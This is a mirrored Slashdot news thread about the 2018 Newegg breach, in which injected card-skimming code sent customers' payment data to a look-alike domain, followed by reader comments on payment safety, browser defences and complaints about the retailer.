Slashdot Mirror
Hackers Stole Customer Credit Cards in Newegg Data Breach (techcrunch.com)
Newegg is clearing up its website after a month-long data breach. TechCrunch: Hackers injected 15 lines of card skimming code on the online retailer's payments page which remained for more than a month between August 14 and September 18, Yonathan Klijnsma, a threat researcher at RiskIQ, told TechCrunch. The code siphoned off credit card data from unsuspecting customers to a server controlled by the hackers with a similar domain name -- likely to avoid detection. The server even used an HTTPS certificate to blend in. The code also worked for both desktop and mobile customers -- though it's unclear if mobile customers are affected.
The online electronics retailer removed the code on Tuesday after it was contacted by incident response firm Volexity, which first discovered the card skimming malware and reported its findings. Newegg is one of the largest retailers in the US, making $2.65 billion in revenue in 2016. The company touts more than 45 million monthly unique visitors, but it's not known precisely how many customers completed transactions during the period.
The online electronics retailer removed the code on Tuesday after it was contacted by incident response firm Volexity, which first discovered the card skimming malware and reported its findings. Newegg is one of the largest retailers in the US, making $2.65 billion in revenue in 2016. The company touts more than 45 million monthly unique visitors, but it's not known precisely how many customers completed transactions during the period.
lol
The last step of checkout has been glitchy for over a year. Though I have been using a card on file and only had to enter my CVV code multiple times or gave up and used PayPal.
It had one job to do.
I should use this sig to advertise my book ISBN-13 : 978-1501515132.
Hosted payment services that redirect you to another domain, e.g. PayPal are much more resistant to scraping. This is obviously a problem that can not be left to individual sites to handle.
...one gold egg. Seriously, it was there for A MONTH and nobody noticed? Might be time to switch to a different site for my computer parts.
Good thing newegg doesn't have anything worth buying or this could have been a serious problem.
I always pay with Bitcoin when buying from Newegg, so I'm not affected by these skimming attacks.
The usual advice is to not let the merchant store your credit card credentials — so they would not be stolen when the company's DB is.
This time, however, the people keeping their cards "on file" with Newegg were safe, whereas those, who entered the credentials anew, weren't...
In Soviet Washington the swamp drains you.
So the bad guys got a 3rd party certificate? Last time I got one (Codomo I think) for my mail server they actually verified my identity by phone in order to actually issue the certificate for me.
Is that not routine now? How could the bad guys not be traced if they want so far as to buy a cert?
bad company, expected outcome.
I had to charge-back them for an item they clearly messed up on and stopped responding to questions. I've never had to do a charge-back before or since from anyone. frequent repeat-customer of 15-years, never had to return anything to these guys before.
I sleep better knowing that HTTPS has made us all safe from teh hax0rs.
Strange things are afoot at the Circle-K.
"Paying electronically is safer, Rick, you shouldn't use cash for anything, you'll just get mugged!", they said. "It's all secured with encrytion, nothing to worry about!", they said
What's next, you going to tell me the Equifax breach was 'fake news' and never happened?
"Oh, well, I don't buy things from Newegg so I feel perfectly safe!", they say to you
Seriously, folks, when is enough going to be enough for you all? It's objectively clear that electronic payment systems, regardless of whose they are, are not anything even close to secure. Leave the plastic at home (or at least leave it in your wallet), pay cash for things in person, and look for some way to at least limit your exposure to the overwhelming risk of paying electronically for anything, anywhere, ever. Do it starting TODAY. Plan on doing it for a long time to come, because these mentally challenged primates who run these systems apparently can't keep all the holes plugged.
The real breach is in that the attackers were somehow able to change the web page content to achieve this end. Do they know how the attackers accomplished this? If not, what's to stop it from reoccurring, even if not by the same people, when someone else figures it out?
File under 'M' for 'Manic ranting'
Newegg used to be great. I'm not sure what happened but its crap now. Overrun by poor vendors that are allowed to falsely advertise. This CC issue is just the latest reason not to use Newegg.
This is why I always either use something like PayPal, Google Pay, Visa Check or similar when given the option, and when not given such an option I use Privacy virtual cards. Privacy gives you virtual debit card numbers so that you can use unique numbers for each retailer, and even allows for single use "burner" cards that close after one use. This, plus the ability to add spending limits on each card will either prevent or greatly reduce the possibility of any funds being taken by a hacker who skims the number. I use a different card for every site, and then burner cards for anything which I trust less. So far I've already blocked one unauthorized charge by setting a strict spending limit on one card (although this was from an shitty extra charge caused by the retailer rather than a hack, but it proves the feature works).
Shameless referral links:
https://cashback.privacy.com/sJS2wEHpZ
https://privacy.com/join/JWVHW
They aren't the same site they were a decade ago, loaded with 3rd party sellers peddling their dubious crap. If you are going to shop at newegg, you might as well just use eBay.
Retail sites need to stop this 3rd party seller crap, we already have eBay for that. It does nothing but give the retailers like newegg, amazon, walmart a bad rap. Sooner or later they'll finally learn this.
Here are the links to the original RiskIQ and Volexity reports on the breach.
RiskIQ: https://www.riskiq.com/blog/la...
Volexity: https://www.volexity.com/blog/...
They're conclusion is basically to get a new credit card number if you transacted with Newegg from 13 Aug through 18 Sep 2018.
Having just bought some things, I'm concerned, of course. Not to mention, newegg isn't remotely as good as they once were. Hell, I bought something on eBay and he shipped it two days faster and will get to me a week earlier than a similar order from newegg.
What are some good alternatives, outside of eBay and Amazon?
I have a hard time using the New Egg gift cards -- maybe the hackers can improve the checkout page so they work correctly?
Because they're hackers, you see. They can be anyone and do anything, they're the bogeyman of cyberspace. So any claim of "getting hacked" automatically means there was nothing you could have done to prevent it. This is why press releases or even news stories claiming "hackers!" are popular... and also not worth the read.
Anyway, one dead simple way to prevent javascript injection would be to disable javascript in the browser. Notice how *cough* certain browsers *cough* make that very hard, very impracticable, or even just plain impossible. But not all do. Of course, that requires that such sites also function without javascript enabled, and most make that impracticable or even just plain impossible, for essentially no reason.
Of course, that's not a complete fix: If the attackers managed to change what the original website served up they could change that to MITM the form submission, but at least there you could detect that suddenly every form from every customer gets sent from the MITM location, and hey what's up with that. Disabling javascript still cuts down on attack surface, since without javascript it's now harder to dynamically cross-load attack code from just any location, and so on. But anyway.
So the problem is the widespread rot that makes such fertile grounds for attackers. Same with, oh, that desktop emulating software package of crap that likes to drop its pants, bend over, and shout "OH HEY I DROPPED THE SOAP AGAIN" at every opportunity. It's so common that a sane environment becomes almost impossible to envision for those who have never experienced anything but this insanity. Thus the blaming of the bogeyman. This says really bad things about the people involved, yes, well spotted dear reader.
What if I paid using masterpass?
Many years ago (1998ish mabye?) I found out about Newegg and ordered a couple of sticks of RAM from them. They shipped me double what I ordered, and charged me for it. It was a nightmare to get my money refunded even AFTER I shipped back two sticks on my dime. It was such a bad experience that I swore I would never order from them again.
Fast forward a few years and I decided to give them another chance, and wow had they changed! They were my gold-standard for internet shopping experience. Fast, often free, shipping, perfect amount of communication and tracking, best prices, feature-rich search options, and fantastic review system.
Needless to say, I haven't bought anything from them for a few years now. It was caused by ordering something that I didn't realize was shipping directly from China. I still go to their site to find items and sometimes read the reviews, but I can now shop around once I find the item I want. Their reviews are still better than Amazon's, but Newegg just isn't close to what it used to be.
My beliefs do not require that you agree with them.
And when was Newegg going to inform their customers about this? Strange that we had to find out about this from a 3rd party news source. Does this only impact Newegg US, or other countries where Newegg does business affected too?
Is it possible to have oh, let's say New Egg, encrypt each and every customers account separately or would that be difficult.
I stopped using NewEgg over 9mo ago. So at least I'm not affected.
As a Connecticut resident who got screwed over by NewEgg releasing false data to the State of Connecticut, when they were also NOT legally obligated to I stopped using them. Ex our tax friendly state in it's endless quest to absolutely ruin any resident of the state and tax them to death decided to purse gathering Sales Tax / "Use Tax" data from NewEgg back around January 2018. They had done this to other sites and online merchants on their quest to collect money. They would petition the vendor with a legally scary letter, telling them to hand over all purchase history for the last 5 years for every Connecticut resident over to the Connecticut Department of Revenue Services, our tax office essentially. Most told them to go pound sand as there was no legal authority for them to do this or request this information from the online vendors and CT couldn't do anything about it.
NewEgg. NewEgg, they just handed the data over. The state then had my ENTIRE purchase history. They did this WITHOUT any consumer notification. It was only AFTER the CT DRS processed the data and sent out Use Tax bills to NewEgg customers did they fess up on releasing the data. This wouldn't be a problem, as technically the Use Tax is owed, however the way they collected the data was flat out illegal. Both from a consumer protection and legal point of view. The bigger issue though THEY ABSOLUTELY messed up the data dumps. For example, 2014 I had made several thousand of dollars of purchases. ONE was made on my account, with a friend's credit card. He got a bill from the CT DRS for my entire 2014 purchase history. Then the data I got for 2016 owed taxes included items that I had used out of state friends credit cards for, and had shipped to them. No use tax was owed. Yet I had the bill. The CT DRS being the CT DRS left you no legal way to challenge this. You could call the number, and talk to someone (which me and several friends tried) who essentially told you to just pay it over and over despite it being wrong and incorrect data. In the end I paid it because it was only a few hundred dollar discrepancy and the consequences and repercussions of having a Tax Bill paid late were too large and would have made a bigger hole to crawl out of given how uncooperative the state was. I still blame NewEgg for giving them data.
Anyway, anyone who still uses NewEgg should have already known how NewEgg cares not the slightest about their customers privacy or information. It's absolutely NO surprise to me this happened, and is only further proof to drop them and not order from them again.
prepaid card you put cash on and then its zero...toss into trash
Big companies and small companies alike are addicted to WEBSTATS. It's hard to find a page out there that doesn't have 14 bits of Javascript code dedicated to giving better, targeted advertising and "customer service experience", so people would hardly be suspicious of code that sends information to "neweggstats.com".
There are HSTS headers that can be put on HTTPS pages to make sure the browser doesn't fall for this sort of thing, but using them tells the browser not to talk to those precious stat servers... so the stat-addicts won't.
People bitch, but the truth is significant losses are happening as a result of this shitty payment solution.
Security is never a priority over sales. The rhetorical question is, "I wonder what their security budget is or staffing?" Answer: Probably next to nothing. Until C Levels face jail time for negligence ergo not doing anything this will continue. Note I didn't say a breach. No one can be completely secure, however, what I am talking about here is doing nothing or next to nothing. Then they should serve time.